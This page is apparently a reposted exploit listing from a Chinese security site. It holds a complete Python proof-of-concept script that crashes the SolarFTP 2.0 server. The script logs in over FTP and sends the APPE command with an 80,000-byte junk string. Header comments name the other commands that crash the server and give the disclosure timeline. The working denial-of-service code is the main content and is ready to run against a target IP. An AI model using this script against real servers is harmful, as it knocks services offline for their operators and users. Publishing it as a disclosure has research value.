首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
来源:http://www.digital-echidna.org 作者:modpr0be 发布时间:2010-12-17  

#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
#        ___       _ __        __            __    _     __
#   ____/ (_)___ _(_) /_____ _/ / ___  _____/ /_  (_)___/ /___  ____ _
#  / __  / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __  / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / /  __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/  \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
#        /____/                          http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
#  say hello to all digital-echidna org crew:
#   otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
 print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
 print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"

 
if len(sys.argv)!=4:
        banner()
        print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0]
        sys.exit(0)

try:
 s.connect((sys.argv[1], 21))
except:
 print "Can\'t connect to server!\n"
 sys.exit(0)
 
s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('APPE '+junk+'\r\n')
s.recv(1024)
s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Aesop GIF Creator <= v2.1 (.ae
·Altarsoft Audio Converter 1.1
·Internet Explorer 8 CSS Parser
·Easy DVD Creator Local Crash P
·Digital Audio Editor 7.6.0.237
·D-Link DIR-300 CSRF Vuln (Chan
·Google Urchin 5.7.03 LFI Vulne
·Windows Win32k Pointer Derefer
·IBM Tivoli Storage Manager (TS
·AhnLab V3 Internet Security 8.
·NProtect Anti-Virus 2007 <= 20
·ESTsoft ALYac Anti-Virus 1.5 <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved